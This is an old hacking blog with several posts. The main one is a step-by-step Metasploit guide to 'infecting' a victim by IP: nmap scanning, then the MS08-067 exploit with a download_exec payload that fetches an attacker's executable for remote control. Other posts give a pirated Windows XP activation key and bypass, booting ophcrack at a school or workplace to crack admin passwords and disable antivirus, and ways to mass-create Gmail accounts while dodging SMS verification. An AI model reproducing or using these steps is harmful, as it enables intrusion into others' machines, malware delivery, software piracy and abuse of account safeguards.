Rambo

Hiiiii Friends I'm Rambo I Need Member For This Site For more software Posting if you interesting So Plz Email Me To This Mail address rambo.hacker@yahoo.in thanks

Plz Hide Your IP

Saturday, August 7, 2010

Infecting through IP

Gods Own CountyImage by tricky ™ via Flickr

Many of the times I saw this question asked here & everywhere on the Internet that
“Is it possible to infect victim using his IP address?”

So, I am going to show you how to do it.

Requirements:

Nmap
Metasploit
(Nmap & Metasploit Link Coming soon)


First of all you need target ip of your victim.

Then open Metasploit Console & type db_create.
[Use: This’ll create or connect you to database.]

Once you do that type Nmap.
[Use: This’ll load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV
[This’ll scan OS, Ports, and Services running on victim’s computer.]
Wait for 5 min’s to complete its scan.
Once done, Note down the OS, Ports, and Services running on victim’s computer.

Now it’s time to exploit victim’s machine.
Exploit depends on the OS, Ports, and Services running on victim’s computer.
So, you’re lucky if you get OS WIN XP or 2000 because it’s easy to exploit them.
No matter weather they’re protected by any firewall or not.

Now I’ll tell you exploiting:-

Windows 2000 (all versions SP1, SP2, SP3, SP4)
Windows XP (all versions SP1, SP2, SP3)

Type show exploits
[Use: This’ll show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi
[Use: This’ll select the exploit windows/smb/ms08_067_netapi]

Now Type show targets
[Use: This’ll show all targets by exploit]

Now Type set target 0
[Use: This’ll set target to 0 specified]
Then type show payloads
[Use: This’ll bring up all the payloads]
Next type set payload windows/download_exec
[Use: This’ll set payload as windows/download_exec]

Then Type show options
[Use: This’ll show all options in the exploit & payload]
In window you’ll see many options, in which you need to
Fill only two options RHOST & URL.

Type set RHOST
[Use: This’ll set RHOST (victim’s ip) to xxx.xxx.xxx.xxx]

Next Type set URL http://www.xxxx.com/xxx.exe
[Use: This’ll set URL to your direct server link.]

At last you need to type exploit
[Use: This will launch your exploit & your victim will be infected.]

You can now control you're victim with RAT.
So, any versions of Win 2000-XP can be exploited easily.
In case if you didn’t get this two OS’, immediately after Nmap scan
You can use the command db_autopwn –p –t –e.
In most cases you get a shell.

Good Luck!
Enhanced by Zemanta

Make Your Own Folder Locker

we're going to make a hidden folder, it is hidden by a little program, when you open this program, you should type the correct password , so your folder will be seen.

OK, open notepad and write in it :

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Enter password to lock folder or for cancel press N
set/p "cho=>"
if %cho%==XXXX goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==XXXX goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End


replace the XXXX by the password you want
save it finally anything.bat

(.bat Is impotent)

Make Your Windows Xp Validate

How to validate your windows XP copy!!(100% working)
1. Go to "Run" and type REGEDIT
2. Now expand: HKEY LOCAL MACHINE
3. click on SOFTWARE
4. click on MICROSOFT
5. click on WINDOWSNT
6. click on Current Version
7. click on WPAEvents
8. On the right double-click on OOBETimer
9. in that window delete everything you can and exit
10. go to "Run" and type: %systemroot%\system32\oobe\msoobe.exe /a
11. choose: Yes i wish to call
12. click on modify product key
13. type in the key : THMPV-77D6F-94376-8HGKG-VRDRQ
14. click update/ativate
15. pres remember later
16 Restart the windows
17. when back go to "Run" and type the same that is:%systemroot%\system32\oobe\msoobe.exe /a
18. you will see there Windows activated. Press OK to exit

Find Admin Password (Without Breck Password)

1. This is to crack the actual computers admin, NOT the server admin. (This may not sound to useful but, you will be surprised how nice it is to have full access to any non-server file, like command prompt)

First, you will need a cd to burn ophcrack to, download and burn the image from here

Second, bring the cd to school or your place of business

Third, change the boot sequence by restarting a computer with ophcrack in the drive and hit F2... from there change the boot sequence to boot from CD as primary.

Four, save and exit and it should start from the CD...

Five, choose graphical interface and just wait for linux to load and for the SAM file to begin being cracked. (Idk how long it will take, but it took five minutes for me the first time



Six, remember the user name and password, and you are done... You now have the administrators password for that computer... which for later can help you sneak around, delete anti virus, and even use programs like PsTools to remotely execute programs...

How to make Gmail accounts without SMS verification

Well, let me tell you how I do it every day without deleting cookies or anything.


You can do it with proxy or without proxy. For me it works everytime. So, let's start:
1. Go to gmail.com and hit the sing up page

2. For first and last name I use imdb.com to search names from movies or names of the actors, I combine them, I use a unique name that I believe is not used by anyone. If google will detect that name in their database they will require SMS verification. So go with a unique name, not the popular ones like John Doe or whatever. If you will use the same name on other account they will require SMS verification so stick with a unique one. Everything need to be unique.

3. For login name I don't use numbers and is unique, I will not use that username again. I only use dot in username. If you will create another username similar to that, again, they will detect and they will ask for SMS verification on both accounts.

4. Password. I use a unique password for every account. If you will make a few accounts with the same password they will detect them and they will ask you for SMS verification, so try a unique password. I don't use number in passwords. And I don't use similar passwords.

5. Security Question. Write your own question. Don't use it in other account.

6. I don't use recovery email.

7. The rest it is at your choice.

I think that at this part you understand that your whole profile must be unique. If you use the same name, password, similar username with other accounts they will always request SMS verification. Be unique and you will not even need a proxy. I do it every day and I can't even remeber when they requested me SMS verification. I know this from my experience.

Live